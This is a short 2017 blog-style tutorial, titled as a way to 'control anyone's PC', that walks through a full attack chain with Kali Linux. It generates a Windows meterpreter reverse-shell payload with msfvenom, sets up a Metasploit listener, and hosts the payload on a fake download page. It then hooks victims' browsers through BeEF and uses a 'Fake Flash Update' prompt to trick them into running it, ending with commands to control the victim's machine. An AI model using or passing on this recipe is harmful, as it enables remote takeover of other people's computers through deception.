Tuesday, June 6, 2017

Hack / Control Anyone's PC with BeEF | Kali Linux | Tutorial | 2017

root@kali:msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 x > /root/Desktop/payload.exe
root@kali:cd /usr/sharebeef-xss/

Open msfconsole
msf>use exploit/multi/handler
msf>exploit(handler)>show options
msf>set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf>exploit(handler)>set LHOST
msf>exploit(handler)>set LPORT 443
msf>show options
make simple fake download page
transfer created payload from desktop to var/www/html
copy Hook URL:[ip address] from ./beef results and pased it in index.html

index.html from var/www/html [see screenshot below]

visit the BeEf website UI [ - can view from ./beef results]
login beef/beef usernamea and password

open cmd:
root@kali: service apache2 start
open browser and type
go to BeEF Control Panel from browser tab
select online browsers>>>click Commands tab
click Social Engineering folder>select Fake Flash Update
update image: http://your ip
update custom payload URL: http://your ip
click execute
once victim will download it.. youll recieve a meterpreter session.
to interact with the meterpreter session just type:
sessions -i L
[this will interact with the meterpreter session "l", if you want to see a list of sessionts just type: sessions]
type "Help" or "?" to have a full list of usefull commands to control your victim's computer]

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